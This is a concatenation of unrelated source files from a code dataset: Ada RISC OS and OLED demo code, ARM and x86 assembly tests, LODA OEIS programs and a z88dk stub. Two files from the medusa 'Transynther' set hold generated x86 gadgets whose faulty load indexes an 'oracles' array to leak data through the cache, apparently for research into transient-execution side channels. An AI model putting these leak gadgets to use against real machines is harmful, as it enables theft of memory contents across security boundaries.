Exception; Exception_Bad_itm : Exception; Exception_Div_zero : Exception; Exception_Bad_base : Exception; Exception_Bad_numb : Exception; Exception_Numb_too_big : Exception; Exception_Bad_claim_num : Exception; Exception_Bad_release : Exception; Exception_Bad_dev_no : Exception; Exception_Bad_dev_vec_rel : Exception; Exception_Bad_env_number : Exception; Exception_Cant_cancel_quit : Exception; Exception_Ch_dynam_cao : Exception; Exception_Ch_dynam_not_all_moved : Exception; Exception_Apl_wspace_in_use : Exception; Exception_Ram_fs_unchangeable : Exception; Exception_Oscli_long_line : Exception; Exception_Oscli_too_hard : Exception; Exception_Rc_exc : Exception; Exception_Sys_heap_full : Exception; Exception_Buff_overflow : Exception; Exception_Bad_time : Exception; Exception_No_such_swi : Exception; Exception_Unimplemented : Exception; Exception_Out_of_range : Exception; Exception_No_oscli_specials : Exception; Exception_Bad_parameters : Exception; Exception_Arg_repeated : Exception; Exception_Bad_read_sys_info : Exception; Exception_Cdat_stack_overflow : Exception; Exception_Cdat_buffer_overflow : Exception; Exception_Cdat_bad_field : Exception; Exception_Cant_start_application : Exception; Exception_Unknown_Error : Exception; procedure Raise_Error (Error : OSError_Access); -- -- Block filled in by the toolbox on WimpPoll -- type ToolBox_Id_Block_Type is record Ancestor_Id : Object_ID; Ancestor_Component: Component_ID; Parent_Id : Object_ID; Parent_Component : Component_ID; Self_Id : Object_ID; Self_Component : Component_ID; end record; pragma Convention (C, ToolBox_Id_Block_Type); type ToolBox_Id_Block_Pointer is access ToolBox_Id_Block_Type; type Toolbox_EventListener (E : ToolBox_Event_Code_Type; O : Object_ID; C : Component_ID) is abstract new Event_Listener(Toolbox) with record Event_Code : ToolBox_Event_Code_Type := E; Object : Object_ID := O; Component : Component_ID := C; ID_Block : ToolBox_Id_Block_Pointer; end record; type Toolbox_UserEventListener (E : ToolBox_Event_Code_Type; O : Object_ID; C : Component_ID) is abstract new Toolbox_EventListener (E,O,C) with record Event : Event_Pointer; end record; type Toolbox_Event_Header is record Size : System.Unsigned_Types.Unsigned; Reference_Number : Integer; Event_Code : System.Unsigned_Types.Unsigned; Flags : System.Unsigned_Types.Unsigned; end record; pragma Convention (C, Toolbox_Event_Header); Wimp_Block_Size : constant integer := 63; type Wimp_Block_Type is array (0 .. Wimp_Block_Size) of integer; type Wimp_Block_Pointer is access Wimp_Block_Type; Number_Of_Messages : integer := 0; Max_Number_Of_Messages : constant integer := 63; type Messages_List_Type is array (0 .. Max_Number_Of_Messages) of integer; type Messages_List_Pointer is access Messages_List_Type; type System_Sprite_Pointer is new Address; type Messages_Control_Block_Type is array (1 .. 6) of System.Unsigned_Types.Unsigned; type Messages_Handle_Type is access Messages_Control_Block_Type; end RASCAL.OS;
led.asm	Silvantica/Etch-A-Sketch	0	20046	<gh_stars>0 ; This file assumes "base.asm" and "delay.asm" are imported somewhere ; Enables GPIO output on GPIO27 ; This doesn't conflict with enable_buttons because we're using GPFSEL instead of ; GPHEN enable_led: push {r0-r1,lr} mov r0, BASE orr r0, GPIO_OFFSET ;r0 now equals 0x3F200000 ; Set bit 21 of GPFSEL2 to enable output on GPIO27 (see broadcom datasheet) mov r1,#1 lsl r1,#21 str r1,[r0,GPFSEL2_OFFSET] pop {r0-r1,pc} ; Blinks the LED enabled on GPIO27 blink_led: push {r0-r1,lr} mov r0, BASE orr r0, GPIO_OFFSET ;r0 now equals 0x3F200000 ; Turn the light on mov r1,#1 lsl r1,#27 str r1,[r0,GPSET0_OFFSET] ; Wait for a few milliseconds so we can see the blink push {r0} mov r0,#500 bl delay pop {r0} ; Turn the light off mov r1,#1 lsl r1,#27 str r1,[r0,GPCLR0_OFFSET] ; Wait for a few milliseconds so we can see that it's off push {r0} mov r0,#500 bl delay pop {r0} pop {r0-r1,pc}
testc/cputest/daadas.asm	krismuad/TOWNSEMU	124	246408	<gh_stars>100-1000 .386p ASSUME CS:CODE PUBLIC TEST_DAA PUBLIC TEST_DAS ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; EFLAGS_CF EQU 00001H EFLAGS_PF EQU 00004H EFLAGS_AF EQU 00010H EFLAGS_ZF EQU 00040H EFLAGS_SF EQU 00080H EFLAGS_TRAP EQU 00100H EFLAGS_IF EQU 00200H EFLAGS_DF EQU 00400H EFLAGS_OF EQU 00800H EFLAGS_IOPL EQU 03000H EFLAGS_NF EQU 04000H EFLAGS_RF EQU 10000H EFLAGS_VF EQU 20000H EFLAGS_ALIGN_CHECK EQU 40000H ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CODE SEGMENT ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; int TEST_DAA(unsigned int eax,unsigned int edx) TEST_DAA PROC PUSH EBP ; [EBP]=PrevEBP, [EBP+4]=EIP, [EIP+8]=EAX, [EIP+12]=EDX MOV EBP,ESP PUSHAD MOV EAX,[EBP+8] MOV EDX,[EBP+12] XOR AH,AH ADD AL,DL DAA PUSHFD POP EBX AND BL,EFLAGS_SF+EFLAGS_ZF+EFLAGS_PF+EFLAGS_CF+EFLAGS_AF MOV AH,BL AND EAX,0FFFFH MOV [EBP+8],EAX POPAD MOV EAX,[EBP+8] POP EBP RET TEST_DAA ENDP ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; int TEST_DAS(unsigned int eax,unsigned int edx) TEST_DAS PROC PUSH EBP ; [EBP]=PrevEBP, [EBP+4]=EIP, [EIP+8]=EAX, [EIP+12]=EDX MOV EBP,ESP PUSHAD MOV EAX,[EBP+8] MOV EDX,[EBP+12] XOR AH,AH SUB AL,DL DAS PUSHFD POP EBX AND BL,EFLAGS_SF+EFLAGS_ZF+EFLAGS_PF+EFLAGS_CF+EFLAGS_AF MOV AH,BL AND EAX,0FFFFH MOV [EBP+8],EAX POPAD MOV EAX,[EBP+8] POP EBP RET TEST_DAS ENDP ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CODE ENDS END
programs/oeis/143/A143536.asm	neoneye/loda	22	94379	; A143536: Triangle read by rows, T(n,k) = 1 if n is prime, 0 otherwise. ; 0,1,1,1,1,1,0,0,0,0,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0 lpb $0 add $1,1 sub $0,$1 lpe seq $1,10051 ; Characteristic function of primes: 1 if n is prime, else 0. mov $0,$1
libsrc/_DEVELOPMENT/stdio/c/sccz80/vasprintf_callee.asm	jpoikela/z88dk	640	14965	; int vasprintf(char *ptr, const char format, void *arg) SECTION code_clib SECTION code_stdio PUBLIC vasprintf_callee EXTERN asm_vasprintf vasprintf_callee: pop af pop bc pop de exx pop de exx push af jp asm_vasprintf
Transynther/x86/_processed/NC/_zr_/i3-7100_9_0xca_notsx.log_21829_1236.asm	ljhsiun2/medusa	9	89115	<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r13 push %r8 push %rbp push %rcx push %rdi push %rdx push %rsi lea addresses_A_ht+0x10fb8, %rdi nop nop nop nop sub %r10, %r10 movb (%rdi), %r12b nop cmp %rbp, %rbp lea addresses_normal_ht+0x1ab18, %r13 nop nop nop and %r8, %r8 movw $0x6162, (%r13) add $27629, %r10 lea addresses_D_ht+0xe038, %rsi lea addresses_WT_ht+0xa7b8, %rdi nop nop xor %rdx, %rdx mov $20, %rcx rep movsw nop nop nop nop and $51885, %r8 lea addresses_WT_ht+0x26f8, %rsi clflush (%rsi) nop nop cmp %r8, %r8 mov $0x6162636465666768, %r10 movq %r10, %xmm3 vmovups %ymm3, (%rsi) nop nop add $26176, %rdi lea addresses_WT_ht+0x1b8e8, %rdi nop nop and %rsi, %rsi movb (%rdi), %r8b nop nop nop xor %rbp, %rbp lea addresses_WC_ht+0x58b8, %rdi nop nop nop nop cmp %r12, %r12 mov $0x6162636465666768, %r8 movq %r8, %xmm6 movups %xmm6, (%rdi) nop and %rsi, %rsi lea addresses_UC_ht+0x17138, %r13 nop nop nop cmp $56368, %rsi mov (%r13), %rbp nop nop nop cmp %rbp, %rbp lea addresses_WC_ht+0x14e74, %r8 clflush (%r8) nop nop mfence movw $0x6162, (%r8) nop inc %rcx pop %rsi pop %rdx pop %rdi pop %rcx pop %rbp pop %r8 pop %r13 pop %r12 pop %r10 ret .global s_faulty_load s_faulty_load: push %r14 push %r8 push %r9 push %rdi push %rdx // Faulty Load mov $0x6e53f300000008b8, %r9 sub $54180, %r14 mov (%r9), %edx lea oracles, %rdi and $0xff, %rdx shlq $12, %rdx mov (%rdi,%rdx,1), %rdx pop %rdx pop %rdi pop %r9 pop %r8 pop %r14 ret /* <gen_faulty_load> [REF] {'src': {'same': False, 'congruent': 0, 'NT': True, 'type': 'addresses_NC', 'size': 8, 'AVXalign': False}, 'OP': 'LOAD'} [Faulty Load] {'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_NC', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 1, 'NT': False, 'type': 'addresses_normal_ht', 'size': 2, 'AVXalign': False}} {'src': {'type': 'addresses_D_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 6, 'NT': False, 'type': 'addresses_WT_ht', 'size': 32, 'AVXalign': False}} {'src': {'same': False, 'congruent': 3, 'NT': False, 'type': 'addresses_WT_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_WC_ht', 'size': 16, 'AVXalign': False}} {'src': {'same': False, 'congruent': 5, 'NT': False, 'type': 'addresses_UC_ht', 'size': 8, 'AVXalign': False}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 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00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
programs/oeis/040/A040875.asm	neoneye/loda	22	90583	; A040875: Continued fraction for sqrt(906). ; 30,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60,10,60 sub $0,1 mod $0,2 mul $0,10 add $0,2 pow $0,2 div $0,26 mul $0,10 add $0,10
example_pico/src/demos.adb	hgrodriguez/sh1107	1	8594	--=========================================================================== -- -- This package is the implementation of the demo package showing examples -- for the SH1107 OLED controller -- --=========================================================================== -- -- Copyright 2022 (C) <NAME> -- -- SPDX-License-Identifier: BSD-3-Clause -- with HAL; with HAL.Bitmap; with HAL.Framebuffer; with RP.Timer; package body Demos is procedure Black_Background_White_Arrow (S : in out SH1107.SH1107_Screen); procedure White_Background_With_Black_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen); procedure Black_Background_With_White_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen); procedure White_Background_4_Black_Corners (S : in out SH1107.SH1107_Screen); procedure Black_Background_4_White_Corners (S : in out SH1107.SH1107_Screen); procedure Black_Background_White_Geometry (S : in out SH1107.SH1107_Screen); procedure White_Background_Black_Geometry (S : in out SH1107.SH1107_Screen); procedure White_Diagonal_Line_On_Black (S : in out SH1107.SH1107_Screen); procedure Black_Diagonal_Line_On_White (S : in out SH1107.SH1107_Screen); type Demo_Procedure is not null access procedure (S : in out SH1107.SH1107_Screen); Demos_Procedures : constant array (Demos_Available) of Demo_Procedure := (Demos.Black_Background_White_Arrow => (Black_Background_White_Arrow'Access), Demos.White_Background_With_Black_Rectangle_Full_Screen => ( White_Background_With_Black_Rectangle_Full_Screen'Access), Demos.Black_Background_With_White_Rectangle_Full_Screen => ( Black_Background_With_White_Rectangle_Full_Screen'Access), Demos.White_Background_4_Black_Corners => (White_Background_4_Black_Corners'Access), Demos.Black_Background_4_White_Corners => (Black_Background_4_White_Corners'Access), Demos.Black_Background_White_Geometry => (Black_Background_White_Geometry'Access), Demos.White_Background_Black_Geometry => (White_Background_Black_Geometry'Access), Demos.White_Diagonal_Line_On_Black => (White_Diagonal_Line_On_Black'Access), Demos.Black_Diagonal_Line_On_White => (Black_Diagonal_Line_On_White'Access) ); Another_Timer : RP.Timer.Delays; THE_LAYER : constant Positive := 1; Corner_0_0 : constant HAL.Bitmap.Point := (0, 0); Corner_1_1 : constant HAL.Bitmap.Point := (1, 1); Corner_0_127 : constant HAL.Bitmap.Point := (0, SH1107.THE_HEIGHT - 1); Corner_127_0 : constant HAL.Bitmap.Point := (SH1107.THE_WIDTH - 1, 0); Corner_127_127 : constant HAL.Bitmap.Point := (SH1107.THE_WIDTH - 1, SH1107.THE_HEIGHT - 1); My_Area : constant HAL.Bitmap.Rect := (Position => Corner_0_0, Width => SH1107.THE_WIDTH - 1, Height => SH1107.THE_HEIGHT - 1); My_Circle_Center : constant HAL.Bitmap.Point := (X => 64, Y => 38); My_Circle_Radius : constant Natural := 10; My_Rectangle : constant HAL.Bitmap.Rect := (Position => (X => 38, Y => 78), Width => 20, Height => 10); procedure Black_Background_White_Arrow (S : in out SH1107.SH1107_Screen) is Corners : constant HAL.Bitmap.Point_Array (1 .. 7) := ( 1 => (40, 118), 2 => (86, 118), 3 => (86, 60), 4 => (96, 60), 5 => (63, 10), 6 => (30, 60), 7 => (40, 60)); Start : HAL.Bitmap.Point; Stop : HAL.Bitmap.Point; My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); for N in Corners'First .. Corners'Last loop Start := Corners (N); if N = Corners'Last then Stop := Corners (1); else Stop := Corners (N + 1); end if; My_Hidden_Buffer.Draw_Line (Start, Stop); end loop; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_White_Arrow; procedure White_Background_With_Black_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Draw_Rect (Area => My_Area); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Background_With_Black_Rectangle_Full_Screen; procedure Black_Background_With_White_Rectangle_Full_Screen (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Draw_Rect (Area => My_Area); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_With_White_Rectangle_Full_Screen; procedure White_Background_4_Black_Corners (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_0, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_1_1, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_127, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_0, Native => 0); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_127, Native => 0); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Background_4_Black_Corners; procedure Black_Background_4_White_Corners (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_0, Native => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_0_127, Native => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_0, Native => 1); My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_127, Native => 1); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_4_White_Corners; procedure Black_Background_White_Geometry (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Draw_Circle (Center => My_Circle_Center, Radius => My_Circle_Radius); My_Hidden_Buffer.Draw_Rounded_Rect (Area => My_Rectangle, Radius => 4); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_White_Geometry; procedure White_Background_Black_Geometry (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Draw_Circle (Center => My_Circle_Center, Radius => My_Circle_Radius); My_Hidden_Buffer.Draw_Rounded_Rect (Area => My_Rectangle, Radius => 4); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Background_Black_Geometry; procedure White_Diagonal_Line_On_Black (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Draw_Line (Start => Corner_0_0, Stop => Corner_127_127); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Diagonal_Line_On_Black; procedure Black_Diagonal_Line_On_White (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Draw_Line (Start => Corner_0_0, Stop => Corner_127_127); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Diagonal_Line_On_White; procedure Show_Multiple_Demos (S : in out SH1107.SH1107_Screen; O : SH1107.SH1107_Orientation; DA : Demo_Array) is begin for D in Demos_Available'First .. Demos_Available'Last loop if DA (D) then Show_1_Demo (S, O, D); end if; end loop; end Show_Multiple_Demos; procedure Show_1_Demo (S : in out SH1107.SH1107_Screen; O : SH1107.SH1107_Orientation; Demo : Demos_Available) is My_Color_Mode : HAL.Framebuffer.FB_Color_Mode; begin My_Color_Mode := SH1107.Color_Mode (This => S); SH1107.Initialize_Layer (This => S, Layer => THE_LAYER, Mode => My_Color_Mode); S.Set_Orientation (O); Demos_Procedures (Demo).all (S); end Show_1_Demo; end Demos;
source/direccion.ads	pdibez/mundo-aspiradora	0	11396	<gh_stars>0 package direccion is type t_direccion is (Izquierda,Derecha); subtype t_posicion is t_direccion range Izquierda .. Derecha ; function direccion_opuesta(d : in t_direccion) return t_direccion; end direccion;
Transynther/x86/_processed/NONE/_un_/i9-9900K_12_0xa0_notsx.log_1_1997.asm	ljhsiun2/medusa	9	244493	<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r13 push %r15 push %r8 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_A_ht+0x1bb67, %rsi lea addresses_normal_ht+0x1ed67, %rdi nop nop nop nop dec %rax mov $84, %rcx rep movsw nop cmp $50366, %r13 lea addresses_WT_ht+0xf4e7, %r15 nop nop dec %rsi movb $0x61, (%r15) nop nop nop inc %rax lea addresses_WC_ht+0x227, %rsi lea addresses_normal_ht+0x3427, %rdi clflush (%rdi) nop nop nop nop sub $20989, %r8 mov $107, %rcx rep movsq nop add $8712, %rdi lea addresses_WT_ht+0x11e67, %rsi lea addresses_UC_ht+0xf067, %rdi nop xor %rbp, %rbp mov $120, %rcx rep movsb nop nop nop cmp %r13, %r13 lea addresses_A_ht+0xb29d, %r15 nop nop nop xor $14533, %rax and $0xffffffffffffffc0, %r15 vmovaps (%r15), %ymm4 vextracti128 $1, %ymm4, %xmm4 vpextrq $1, %xmm4, %r8 nop nop nop sub $41086, %r13 lea addresses_WT_ht+0x9237, %rsi nop cmp %rax, %rax mov (%rsi), %r8w sub $55680, %rax pop %rsi pop %rdi pop %rcx pop %rbp pop %rax pop %r8 pop %r15 pop %r13 ret .global s_faulty_load s_faulty_load: push %r12 push %r13 push %r8 push %r9 push %rcx push %rdi push %rdx push %rsi // Store lea addresses_RW+0xa287, %rdi clflush (%rdi) nop nop nop xor $19796, %rcx movb $0x51, (%rdi) nop nop nop add $47762, %rsi // Load lea addresses_WC+0x8961, %rcx clflush (%rcx) nop xor %rdx, %rdx mov (%rcx), %rdi sub $43194, %r8 // Store lea addresses_US+0x8eef, %r8 nop nop nop nop nop cmp $60423, %rsi movw $0x5152, (%r8) nop nop nop nop xor %rsi, %rsi // REPMOV lea addresses_A+0x1ce7, %rsi lea addresses_WC+0xc667, %rdi nop nop nop nop sub $17824, %r13 mov $48, %rcx rep movsl nop nop and $33070, %rdi // Store lea addresses_normal+0x1f667, %rdx clflush (%rdx) nop nop nop nop nop add %rdi, %rdi movb $0x51, (%rdx) nop nop nop nop cmp %r13, %r13 // Store lea addresses_normal+0x1e267, %rdi nop nop nop sub %r8, %r8 mov $0x5152535455565758, %rcx movq %rcx, (%rdi) dec %r9 // REPMOV lea addresses_D+0xbe67, %rsi lea addresses_PSE+0x9a7, %rdi mfence mov $97, %rcx rep movsb nop nop nop nop nop xor %rdx, %rdx // Store lea addresses_A+0x1c450, %rsi nop nop nop nop nop and $14344, %rcx movl $0x51525354, (%rsi) nop nop nop nop nop sub %r13, %r13 // Store mov $0x21f, %rdx nop nop nop nop nop dec %rdi movl $0x51525354, (%rdx) nop and %rdi, %rdi // Store lea addresses_WT+0x16a67, %rdx nop sub $12665, %r13 movw $0x5152, (%rdx) and $10567, %rdx // Store lea addresses_normal+0x16e67, %rsi nop nop nop nop and $19310, %rdx mov $0x5152535455565758, %rdi movq %rdi, (%rsi) nop nop nop nop nop cmp $65297, %r8 // REPMOV lea addresses_WT+0x15267, %rsi lea addresses_PSE+0x14a1, %rdi nop nop nop nop sub %r8, %r8 mov $33, %rcx rep movsl nop and %rcx, %rcx // Load lea addresses_WT+0x11be7, %rdx nop nop and $39994, %r8 mov (%rdx), %rcx // Exception!!! xor %rsi, %rsi div %rsi nop xor %rdi, %rdi // REPMOV lea addresses_normal+0x16e67, %rsi lea addresses_US+0x8c1f, %rdi nop nop nop nop nop cmp %r12, %r12 mov $59, %rcx rep movsw nop and $24433, %r13 // Faulty Load lea addresses_normal+0x16e67, %r9 nop nop nop dec %rcx mov (%r9), %si lea oracles, %rcx and $0xff, %rsi shlq $12, %rsi mov (%rcx,%rsi,1), %rsi pop %rsi pop %rdx pop %rdi pop %rcx pop %r9 pop %r8 pop %r13 pop %r12 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_RW', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 4}} {'src': {'type': 